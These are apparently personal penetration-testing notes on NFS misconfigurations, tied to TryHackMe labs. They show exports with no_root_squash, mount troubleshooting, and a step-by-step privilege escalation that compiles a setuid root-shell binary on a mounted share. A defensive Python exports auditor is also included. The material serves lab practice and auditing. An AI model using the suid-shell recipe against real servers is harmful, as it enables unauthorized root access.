NFS: Notes

NFS - Network File System

Show mounts on remote NFS server

# showmount -e 10.10.177.215
Export list for 10.10.177.215:
/opt/conf *
#

NFS exploit

Example of no_root_squash

[paradox@localhost tmp]$ cat /etc/exports
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
[paradox@localhost tmp]$

Yet another example of no_root_squash

john@enterprize:~$ cat /etc/exports
cat /etc/exports
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
john@enterprize:~$
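
An added example (not part of the original notes): a small auditor for exports(5) files that parses entries like the two above and flags `no_root_squash`, `insecure` and unrestricted clients. The `/srv/share` line, the function names and the finding labels are constructed for illustration; quoted paths with spaces are not handled.

```python
import re

# Constructed sample: the two export lines quoted above plus a restrictive
# entry (path and 192.0.2.0/24 range are placeholders) for contrast.
SAMPLE_EXPORTS = """\
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
/srv/share 192.0.2.0/24(ro,sync,root_squash,no_subtree_check)
"""

SPEC_RE = re.compile(r"^([^()]*)(?:\(([^)]*)\))?$")

def parse_exports(text):
    """Yield (path, client, options) per client spec; quoted paths unsupported."""
    text = text.replace("\\\n", " ")            # join continued lines
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        defaults = set()
        for spec in fields[1:]:
            if spec.startswith("-"):            # "-opt,opt" sets line defaults
                defaults = set(spec[1:].split(","))
                continue
            m = SPEC_RE.match(spec)
            if not m:
                continue
            client = m.group(1) or "*"          # "(opts)" alone means any host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield fields[0], client, defaults | opts

def audit(text):
    """Return {(path, client): [findings]} for entries that need review."""
    report = {}
    for path, client, opts in parse_exports(text):
        findings = []
        if "no_root_squash" in opts:            # client uid 0 stays uid 0
            findings.append("no_root_squash+rw" if "rw" in opts else "no_root_squash")
        if "insecure" in opts:                  # source ports >= 1024 accepted
            findings.append("insecure")
        if client == "*":                       # no client restriction at all
            findings.append("any-host")
        if findings:
            report[(path, client)] = findings
    return report

if __name__ == "__main__":
    for (path, client), findings in audit(SAMPLE_EXPORTS).items():
        print(f"{path} -> {client}: {', '.join(findings)}")
```

Run against a real server by passing the contents of `/etc/exports` to `audit()`; entries that only use the defaults (`root_squash`, `secure`) with a restricted client produce no findings.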

On attack machine

# mkdir /tmp/nfs
# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs
mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

First mount failed

# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
#
# apt install nfs-common
# service rpcbind restart
# service statd start
# mount -o rw,vers=2 localhost:/home/james /tmp/nfs
mount.nfs: requested NFS version or transport protocol is not supported
apt install nfs-common nfs4-acl-tools
root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs
mount.nfs: Protocol not supported
root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs
root@T420:/tmp/nfs# ls /tmp/nfs
credentials.bak
root@T420:/tmp/nfs#
# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x

On NFS server (victim) machine

$ /tmp/x
#

References

NFS no_root_squash/no_all_squash misconfiguration PE

Network File System on Wikipedia

Practice

>>> THM | Linux PrivEsc - Task 19 - NFS

>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing

>>> THM | Overpass 3 - Hosting

>>> THM | Enterprize

>>> THM | VulnNet: Internal
